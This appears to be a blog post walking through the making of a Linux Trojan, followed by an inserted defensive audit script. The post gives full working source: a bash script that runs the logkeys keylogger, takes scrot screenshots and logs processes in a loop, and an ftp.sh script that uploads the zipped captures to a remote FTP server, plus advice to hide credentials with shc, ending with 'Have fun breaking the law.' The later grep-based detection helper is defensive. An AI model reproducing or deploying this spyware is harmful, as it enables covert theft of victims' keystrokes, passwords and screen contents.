Making A Linux Malware (Virus, Trojan, Worm, etc)


The other day I read an article about the Mac OSX Trojan of 2012. And despite what people may argue, it really isn’t the first. True, Mac OSX has fewer viruses than M$ Winblows, but it still has them. In fact I can count on my hands how many viruses there are for Macs. But this is beside the point.

The point is Macs do get viruses. And so can pretty much any Unix based system. However, it is in fact rare to get viruses on Unix based systems. The reason behind this is that with Unix systems you, as in the user, have to tell the OS everything that it does. So you never worry about a ton of background stuff running.

Now you’re probably thinking to yourself, well, I don’t tell the system to call the kernel and then to call the initrd image so that I can run the system. And if you’re using a GUI desktop environment you’re probably thinking, well, I don’t tell GNOME, KDE, LXDE or whatever to start up.

Well, you may be correct. And the reason for this is that the makers of the particular *nix system have added a script to tell those things to run. If you modify the script you can remove certain things from running. And some developers choose to let the user add extra things they will want to run at start up or on login. Linux distros that have such features include Ubuntu, Bennix, and Red Hat based systems (Fedora, CentOS, Red Hat Enterprise).

Knowing this, it is possible to create viruses for some Unix based systems. It’s just a matter of knowing how. Another problem is that a user has to tell the system everything to do, and a user has to have root privileges to install programs. This means a user wouldn’t be able to get the virus unless he or she was a root user. So the best route for a Unix virus writer is to create a Trojan to trick the user into installing the virus.

Here’s a quick and dirty Trojan virus I made. It has been tested on Ubuntu, Fedora and Bennix 10.10. This Trojan takes several premade programs that have legitimate uses and uses them in a malicious manner. The programs that it uses are listed below.

  • logkeys (found in both the Ubuntu and Fedora repos)
  • scrot (found in both the Ubuntu and Fedora repos)
  • FTP (ships with most Unix systems)
  • PS (ships with most Linux systems)

If it isn’t already obvious what this virus will do: it logs keystrokes and takes screenshots of the user’s screen every few seconds. It uses FTP to upload the information it collects to an FTP server. However, this can also be done using SSH or by having the files emailed to you. But keep in mind this is just a quick and dirty Trojan. So we get the programs onto the person’s computer. Then we write the Trojan in two scripts and hide them in a special location on the computer.

The code for the first script is listed below. This script is a bash script.

#!/bin/bash
cd /tmp
mkdir kl
cd /tmp/kl
mkdir screenshots
mkdir processes
touch kl.log
echo password | sudo -S logkeys --start --output /tmp/kl/kl.log
for (( ; ; ))
do
for count in {1..10}
do
scrot -q 100 /tmp/kl/screenshots/`date '+%H-%M-%Y-%m-%d'`.png
ps aux >> /tmp/kl/processes/log-`date '+%H-%M-%Y-%m-%d'`.txt
echo "$count round is done"
sleep 1
done
cd /tmp
echo password | sudo logkeys --kill
zip -r -9 logs-`date '+%Y-%m-%d'` /tmp/kl
sh $HOME/ftp.sh
cd /tmp/kl
echo password | sudo -S logkeys --start --output /tmp/kl/kl.log
done

The above code should be pretty self explanatory. Since this script collects quite a bit of data, we tell the script to store the data in the /tmp directory. This way it gets deleted when /tmp gets full or when the computer gets restarted.

The next script is a shell script which gets called by the above script. This script is called ftp.sh.


#!/bin/sh
HOST='ftp.yoursite.com'
USER='username'
PASSWD='password'
FILE='*.zip'

ftp -in $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
cd www
binary
put $FILE
quit
END_SCRIPT
exit 0

Once again, the above script is pretty self explanatory. Now, since we would be typing in valuable information such as our FTP password, user name, and the FTP server, we may want to protect this script. But please keep in mind that FTP doesn’t encrypt information anyhow. You’re at risk when using FTP either way. You may prefer to use SSH instead. Either way, to protect this information from the user we will compile the script into a binary file. To do this we will use shc.

For example we will compile the ftp.sh file like so.


shc  -f ftp.sh
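The two scripts above leave fairly loud traces on a host, and the credential handling is weaker than it looks: shc is only applied to ftp.sh, so the sudo password in the first script stays in plaintext in the `echo password | sudo -S` line, and the FTP login travels in cleartext as the post already notes. As an added defensive example, not code from the original post, here is a small POSIX shell audit helper that checks a process listing and a script for exactly those traces: a running logkeys daemon, a scrot screenshot loop, a scripted `ftp -in` upload, the /tmp/kl staging directory, and a password piped into `sudo -S`. The indicator strings come from the scripts above; the sample `ps aux` listing, the script excerpt and the host name ftp.example.invalid are constructed for the test and are not real data.

```sh
#!/bin/sh
# Added host-audit helper; not code from the original post. It looks for the
# traces the post's Trojan leaves on a host: a running logkeys daemon writing
# to /tmp/kl, a scrot screenshot loop, a scripted "ftp -in" upload, and a
# plaintext sudo password piped with "echo ... | sudo -S" inside a script.

# Extended regular expression for the process-level indicators from the post.
PS_INDICATORS='logkeys --start|scrot -q|ftp -in|/tmp/kl'

# Constructed "ps aux" style listing used for offline testing. On a real host
# pipe the live listing in instead:  ps aux | scan_ps
SAMPLE_PS='USER   PID %CPU %MEM COMMAND
root   812  0.0  0.1 /usr/sbin/sshd -D
alice 1201  0.3  0.5 bash
root  1330  0.0  0.2 logkeys --start --output /tmp/kl/kl.log
alice 1345  1.2  0.8 scrot -q 100 /tmp/kl/screenshots/10-03-2012-04-20.png
alice 1350  0.0  0.2 ftp -in ftp.example.invalid'

# Constructed script excerpt standing in for a file found in a user's home.
SAMPLE_SCRIPT='#!/bin/bash
cd /tmp/kl
echo password | sudo -S logkeys --start --output /tmp/kl/kl.log
sleep 1'

# Print every process line that matches an indicator (stdin -> stdout).
# The grep -v drops the scanning pipeline itself when run against a live ps;
# "|| true" keeps the function exit status 0 when nothing matches.
scan_ps() {
    grep -E "$PS_INDICATORS" | grep -v 'grep -E' || true
}

# Print, with line numbers, script lines that feed a literal password to
# sudo -S (stdin -> stdout).
scan_script_for_sudo_password() {
    grep -nE 'echo +[^|]+\| *sudo +-S' || true
}

# Count the lines in a stream; prints a bare number.
count_lines() {
    wc -l | tr -d ' '
}

# Wrappers over the constructed samples; these are what the self-test checks.
sample_ps_hits()     { printf '%s\n' "$SAMPLE_PS"     | scan_ps | count_lines; }
sample_script_hits() { printf '%s\n' "$SAMPLE_SCRIPT" | scan_script_for_sudo_password | count_lines; }

# Report whether the staging directory from the post exists. The path is a
# parameter so the check can be pointed at any directory.
staging_dir_status() {
    if [ -d "$1" ]; then echo present; else echo absent; fi
}

# Stand-alone run: report on the constructed samples and on the real /tmp/kl.
printf '%s\n' "$SAMPLE_PS" | scan_ps
printf '%s\n' "$SAMPLE_SCRIPT" | scan_script_for_sudo_password
echo "/tmp/kl: $(staging_dir_status /tmp/kl)"
```

On the constructed listing the scan flags three processes (logkeys, scrot and ftp) and one script line (the password piped into sudo -S). Against a live host, `ps aux | scan_ps` and `scan_script_for_sudo_password < some_script.sh` do the same work; the functions only read from stdin and never modify anything.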

That’s pretty much it. Have fun breaking the law. And don’t whine if you get caught. I will take no responsibility if you use anything I talked about in this post.